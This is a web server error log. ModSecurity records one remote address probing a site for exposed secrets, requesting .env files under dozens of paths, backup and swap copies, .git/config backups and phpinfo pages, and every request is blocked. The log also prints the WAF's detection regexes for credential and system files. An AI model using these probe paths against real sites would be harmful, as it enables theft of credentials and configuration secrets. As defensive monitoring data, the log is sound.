[Tue May 26 15:32:26.679427 2026] [security2:error] [pid 724639:tid 724664] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVvshKJRbiNp3eWdT1njgAA2Rg"]
[Tue May 26 15:32:26.680006 2026] [security2:error] [pid 724639:tid 724669] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVvshKJRbiNp3eWdT1njwAA2R0"]
[Tue May 26 15:32:26.724366 2026] [security2:error] [pid 724639:tid 724674] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.stvica.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVvshKJRbiNp3eWdT1nkgAA5iI"]
[Tue May 26 15:32:26.825594 2026] [security2:error] [pid 724639:tid 724678] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVvshKJRbiNp3eWdT1nmwAAzSY"]
[Tue May 26 15:32:26.828553 2026] [security2:error] [pid 724639:tid 724680] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env~"] [unique_id "ahVvshKJRbiNp3eWdT1nngAAzSg"]
[Tue May 26 15:32:26.971883 2026] [security2:error] [pid 724639:tid 724688] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVvshKJRbiNp3eWdT1nrQAArDA"]
[Tue May 26 15:32:26.971993 2026] [security2:error] [pid 724639:tid 724766] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVvshKJRbiNp3eWdT1nrgAArH4"]
[Tue May 26 15:32:26.973255 2026] [security2:error] [pid 724639:tid 724691] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVvshKJRbiNp3eWdT1nrwAArDM"]
[Tue May 26 15:32:27.428013 2026] [autoindex:error] [pid 724639:tid 724731] [remote 195.178.110.199:46950] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:27.429458 2026] [security2:error] [pid 724639:tid 724741] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVvsxKJRbiNp3eWdT1n8AAApGU"]
[Tue May 26 15:32:27.475533 2026] [autoindex:error] [pid 724639:tid 724755] [remote 195.178.110.199:46950] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:27.477305 2026] [security2:error] [pid 724639:tid 724746] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1n9AAAkmo"]
[Tue May 26 15:32:27.480742 2026] [autoindex:error] [pid 724639:tid 724744] [remote 195.178.110.199:46950] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:27.499817 2026] [security2:error] [pid 724639:tid 724749] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1n9gAA5G0"]
[Tue May 26 15:32:27.566098 2026] [security2:error] [pid 724639:tid 724641] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1n_QAArwE"]
[Tue May 26 15:32:27.571139 2026] [security2:error] [pid 724639:tid 724756] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1n_wAAuXQ"]
[Tue May 26 15:32:27.571286 2026] [security2:error] [pid 724639:tid 724754] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1n_gAAuXI"]
[Tue May 26 15:32:27.578596 2026] [security2:error] [pid 724639:tid 724759] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1oAAABAnc"]
[Tue May 26 15:32:27.578855 2026] [security2:error] [pid 724639:tid 724757] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1oAQABAnU"]
[Tue May 26 15:32:27.626979 2026] [security2:error] [pid 724639:tid 724645] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1oBgAAlAU"]
[Tue May 26 15:32:27.626992 2026] [security2:error] [pid 724639:tid 724762] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1oBwAAlHo"]
[Tue May 26 15:32:27.864793 2026] [security2:error] [pid 724639:tid 724667] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVvsxKJRbiNp3eWdT1oKgAAnhs"]
[Tue May 26 15:32:27.946123 2026] [security2:error] [pid 724639:tid 724678] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/admin-app/.env"] [unique_id "ahVvsxKJRbiNp3eWdT1oNwAA8iY"]
[Tue May 26 15:32:28.022083 2026] [security2:error] [pid 724639:tid 724685] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVvtBKJRbiNp3eWdT1oQwAAjy0"]
[Tue May 26 15:32:28.070219 2026] [security2:error] [pid 724639:tid 724763] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVvtBKJRbiNp3eWdT1oSAAAins"]
[Tue May 26 15:32:28.082062 2026] [security2:error] [pid 724639:tid 724858] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvsxKJRbiNp3eWdT1oCgAAAN4"]
[Tue May 26 15:32:28.094009 2026] [security2:error] [pid 724639:tid 724766] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api-backend/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1oTAAAin4"]
[Tue May 26 15:32:28.105965 2026] [security2:error] [pid 724639:tid 724764] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api-node/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1oTQAAinw"]
[Tue May 26 15:32:28.148916 2026] [security2:error] [pid 724639:tid 724765] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1oUAAAin0"]
[Tue May 26 15:32:28.237873 2026] [security2:error] [pid 724639:tid 724704] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/api/info.php"] [unique_id "ahVvtBKJRbiNp3eWdT1oXgAAikA"]
[Tue May 26 15:32:28.302241 2026] [security2:error] [pid 724639:tid 724711] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/api/phpinfo.php"] [unique_id "ahVvtBKJRbiNp3eWdT1oZgAAikc"]
[Tue May 26 15:32:28.305263 2026] [security2:error] [pid 724639:tid 724698] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/administrator/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1oSgAAijo"]
[Tue May 26 15:32:28.397721 2026] [security2:error] [pid 724639:tid 724734] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/apis/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ocgAA914"]
[Tue May 26 15:32:28.452246 2026] [security2:error] [pid 724639:tid 724737] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1oeAAAoGE"]
[Tue May 26 15:32:28.606217 2026] [security2:error] [pid 724639:tid 724749] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/application/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1okwAAlG0"]
[Tue May 26 15:32:28.610058 2026] [security2:error] [pid 724639:tid 724747] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/apps/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1olAAAxWs"]
[Tue May 26 15:32:28.692663 2026] [security2:error] [pid 724639:tid 724740] [remote 206.189.187.127:46224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVvtBKJRbiNp3eWdT1ohQAA_GQ"]
[Tue May 26 15:32:28.909651 2026] [security2:error] [pid 724639:tid 724659] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ouAAA2RM"]
[Tue May 26 15:32:28.911802 2026] [security2:error] [pid 724639:tid 724655] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend-api/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ouQAA2Q8"]
[Tue May 26 15:32:28.914531 2026] [security2:error] [pid 724639:tid 724657] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back-api/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ougAAnhE"]
[Tue May 26 15:32:28.914560 2026] [security2:error] [pid 724639:tid 724660] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back-end/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ouwAAnhQ"]
[Tue May 26 15:32:28.950228 2026] [security2:error] [pid 724639:tid 724661] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVvtBKJRbiNp3eWdT1ovAAA8xU"]
[Tue May 26 15:32:29.057786 2026] [security2:error] [pid 724639:tid 724671] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backup/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1oywAAlR8"]
